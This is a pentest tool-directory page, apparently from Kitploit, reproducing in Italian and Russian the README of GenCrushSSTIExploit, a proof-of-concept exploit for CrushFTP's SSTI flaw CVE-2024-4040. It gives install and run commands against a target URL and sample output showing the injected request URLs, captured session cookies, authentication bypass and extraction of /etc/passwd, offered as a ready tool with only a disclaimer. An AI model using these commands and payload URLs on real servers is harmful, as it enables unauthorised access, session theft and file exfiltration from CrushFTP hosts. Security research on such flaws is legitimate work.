Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/geniuszly/gencrushsstiexploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneApprendimento e Formazione
GitHubgeniuszly/gencrushsstiexploit

GenCrushSSTIExploit

è un PoC per CVE-2024-4040, uno strumento per sfruttare la vulnerabilità SSTI in CrushFTP

Vedi Repository
811 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

EN

GenCrushSSTIExploit è uno strumento di exploit PoC che mira alla vulnerabilità SSTI (Server-Side Template Injection) in CrushFTP CVE-2024-4040. Questo strumento dimostra come sfruttare questa vulnerabilità esclusivamente per scopi educativi e di hacking etico.

Caratteristiche

  • Stabilisce una sessione con il server CrushFTP per estrarre i cookie di autenticazione.
  • Sfrutta la vulnerabilità SSTI per iniettare payload.
  • Tenta di bypassare l'autenticazione ed estrarre file sensibili dal server.
  • Usa rich per un output console bello e stilizzato.

Dichiarazione di non responsabilità

⚠️ Usa questo strumento in modo responsabile! È destinato solo a scopi di ricerca ed educativi. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.

Installazione

Prerequisiti

  • Python 3.7+
  • pip (installatore di pacchetti Python)

Clona il Repository

root@kitploit:~
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

Installa i Pacchetti Richiesti

root@kitploit:~
pip install -r requirements.txt

Utilizzo

Comando Base

root@kitploit:~
python GenCrushSSTIExploit.py -t <TARGET_URL>
  • -t / --target: Specifica l'URL di destinazione del server CrushFTP vulnerabile.

Parametri Opzionali

  • -l / --lfi: Local File Inclusion. Specifica il file da includere per l'estrazione.
  • -w / --wordlist: Specifica una wordlist per forzare i percorsi dei file.

Esempio

root@kitploit:~
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

Output di Esempio

root@kitploit:~
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...

RU

GenCrushSSTIExploit — это PoC инструмент эксплуатации уязвимости SSTI (Server-Side Template Injection) в CrushFTP CVE-2024-4040. Этот инструмент демонстрирует, как использовать данную уязвимость в образовательных и этических целях.

Возможности

  • Устанавливает сессию с сервером CrushFTP для извлечения куки аутентификации.
  • Эксплуатирует уязвимость SSTI для внедрения полезных нагрузок.
  • Пытается обойти аутентификацию и извлечь конфиденциальные файлы с сервера.
  • Использует rich для красивого и стилизованного вывода на консоль.

Отказ от ответственности

⚠️ Используйте этот инструмент ответственно! Он предназначен только для исследований и образовательных целей. Автор не несет ответственности за любое неправильное использование или ущерб, причиненный этим инструментом.

Установка

Предварительные требования

  • Python 3.7+
  • pip (менеджер пакетов Python)

Клонирование репозитория

root@kitploit:~
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

Установка необходимых пакетов

root@kitploit:~
pip install -r requirements.txt

Использование

Основная команда

root@kitploit:~
python GenCrushSSTIExploit.py -t <ЦЕЛЕВОЙ_URL>
  • -t / --target: Указывает целевой URL уязвимого сервера CrushFTP.

Дополнительные параметры

  • -l / --lfi: Включение локального файла. Указывает файл для извлечения.
  • -w / --wordlist: Указывает словарь для перебора путей к файлам.

Пример

root@kitploit:~
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

Пример вывода

root@kitploit:~
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
Scarica lo strumento